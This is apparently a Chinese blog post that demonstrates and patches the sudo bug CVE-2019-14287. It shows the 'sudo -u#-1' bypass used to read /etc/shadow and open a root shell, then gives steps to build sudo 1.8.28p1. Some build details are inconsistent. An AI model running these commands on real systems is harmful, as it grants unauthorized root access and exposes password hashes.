CVE-2019-14287漏洞与修复过程

CVE-2019-14287漏洞与修复过程

  • CVE-2019-14287漏洞
    • 展示
    • 修复漏洞

CVE-2019-14287漏洞

CVE-2019-14287本地提权漏洞,漏洞因为是Sudo<1.8.28,只需要升级sudo>1.8.28的就可以修复完成

展示

  1. 使用root用户修改权限文件:vim /etc/sudoers ,添加如下:
chen ALL=(ALL,!root) ALL

CVE-2019-14287漏洞与修复过程_第1张图片
2. 添加用户:chen, chen

Useradd chen
Passwd chen
  1. 使用chen用户查看文件是没有权限的: cat /etc/shadow
    CVE-2019-14287漏洞与修复过程_第2张图片
  2. 使用命令, sudo -u#-1 cat /etc/shadow
    可以看到,chen用户被提权看到这个文件的内容
    CVE-2019-14287漏洞与修复过程_第3张图片
  3. 查看当前登录的用户:whoami
    是为:chen在这里插入图片描述
    6.,chen用户使用命令: ** sudo -u#-1 /bin/bash**;
    再次输入whoami,直接是root用户在这里插入图片描述
    7.再使用命令: su root
    直接不需要密码,直接提权了,变成了root用户
    在这里插入图片描述

修复漏洞

1.下载修复的包:wget http://www.sudo.ws/dist/sudo-1.8.28p1.tar.gz
在这里插入图片描述
CVE-2019-14287漏洞与修复过程_第4张图片
2.解压:tar -zxvf sudo-1.8.28p1.tar.gz
3.进入目录:cd sudo-1.8.28p1 ; 然后安装
CVE-2019-14287漏洞与修复过程_第5张图片

/configure --prefix=/usr              \
            --libexecdir=/usr/lib      \
            --with-secure-path         \
            --with-all-insults         \
            --with-env-editor          \
            --docdir=/usr/share/doc/sudo-1.9.2 \
            --with-passprompt="[sudo] password for %p: " &&
make

4.再执行:make install && ln -sfv libsudo_util.so.0.0.0 /usr/lib/sudo/libsudo_util.so.0
5.修复成功
CVE-2019-14287漏洞与修复过程_第6张图片

你可能感兴趣的:(网络安全渗透,网络安全,经验分享)